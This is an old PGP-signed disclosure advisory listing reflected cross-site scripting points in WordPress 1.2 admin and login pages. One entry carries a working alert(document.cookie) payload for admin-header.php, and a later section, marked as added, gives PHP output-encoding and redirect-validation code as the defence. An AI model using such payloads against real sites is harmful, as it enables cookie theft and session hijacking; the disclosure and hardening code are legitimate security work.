-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Multiple XSS Vulnerabilities in WordPress 1.2

URL: http://wordpress.org/
Version: WordPress 1.2
Risk: XSS

Description:
WordPress is a state-of-the-art semantic personal publishing platform
with a focus on aesthetics, web standards, and usability. [...]
Go to http://wordpress.org/ for detailed information.

Cross Site Scripting:

> wp-login.php:
/wp-login.php?redirect_to=[XSS]
/wp-login.php?mode=bookmarklet&text=[XSS]
/wp-login.php?mode=bookmarklet&popupurl=[XSS]
/wp-login.php?mode=bookmarklet&popuptitle=[XSS]

Nearly every file in the administration panel of WordPress is
vulnerable to XSS attacks.

> admin-header.php:
/admin-header.php?redirect=1&redirect_url=%22;alert(document.cookie)//
Nice bug. ;o)

> bookmarklet.php:
/bookmarklet.php?popuptitle=[XSS]
/bookmarklet.php?popupurl=[XSS]
/bookmarklet.php?content=[XSS]
/bookmarklet.php?post_title=[XSS]

> categories.php:
/categories.php?action=edit&cat_ID=[XSS]

> edit.php:
/edit.php?s=[XSS]

> edit-comments.php:
/edit-comments.php?s=[XSS]
/edit-comments.php?mode=[XSS]

and so on ...

Solution:
There is not any solution yet. I contacted Matthew Mullenweg, one of
the lead developers of WordPress, on Wednesday but I have not received
any answer yet.

Credits:
Thomas Waldegger

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFD9X/8kCo6/ctnOpYRAzjyAJ9h4Auu2GzsmfJlwl/yJ4bJZBltYgCfSdGl
Kj4s+Tgsx+E6KsRAw1rDDK4=
=8UmG
-----END PGP SIGNATURE-----
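
Added example, not part of the original advisory and not WordPress source code: a sketch of the context-aware output encoding that closes the reflected parameters listed above. It assumes, from the shape of the admin-header.php value (a leading %22 and trailing //), that redirect_url is written into a JavaScript string; the function names are hypothetical and PHP 7.3 or later is assumed.

```php
<?php
// Added example; function names are hypothetical, not WordPress 1.2 source.

// HTML text/attribute context, e.g. a parameter echoed into a form field.
function esc_html_ctx(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// JavaScript string context, e.g. a parameter written into a <script> block.
// json_encode emits a complete quoted string literal; the JSON_HEX_* flags
// also escape < > & ' " so the value cannot end the string or the script
// element. Invalid UTF-8 raises JsonException instead of returning false.
function esc_js_ctx(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// Accept only same-site relative paths as redirect targets.
function safe_redirect_target(string $value, string $fallback = '/'): string
{
    // One leading "/", not followed by "/" or "\", no control chars or backslashes.
    $ok = preg_match('#^/(?![/\\\\])[^\x00-\x1f\\\\]*\z#', $value) === 1;
    return $ok ? $value : $fallback;
}

// Constructed sample input: the admin-header.php value from the advisory, URL-decoded.
$redirectUrl = '";alert(document.cookie)//';

// Assumed unsafe pattern: raw concatenation lets the value close the string literal.
$unsafe = 'var target = "' . $redirectUrl . '";';

// Hardened: validate the target first, then encode for the output context.
$validated = 'var target = ' . esc_js_ctx(safe_redirect_target($redirectUrl)) . ';';

// Encoding alone already keeps the raw value inside the string literal.
$encodedOnly = 'var target = ' . esc_js_ctx($redirectUrl) . ';';

// The same value in an HTML attribute needs HTML encoding, not JS encoding.
$field = '<input type="hidden" name="redirect_to" value="'
    . esc_html_ctx($redirectUrl) . '">';

foreach ([$unsafe, $validated, $encodedOnly, $field] as $line) {
    echo $line, PHP_EOL;
}
```

The encoder has to match the place the value lands: htmlspecialchars() alone does not protect a value placed in a script block, and json_encode() output is not safe to drop into an HTML attribute.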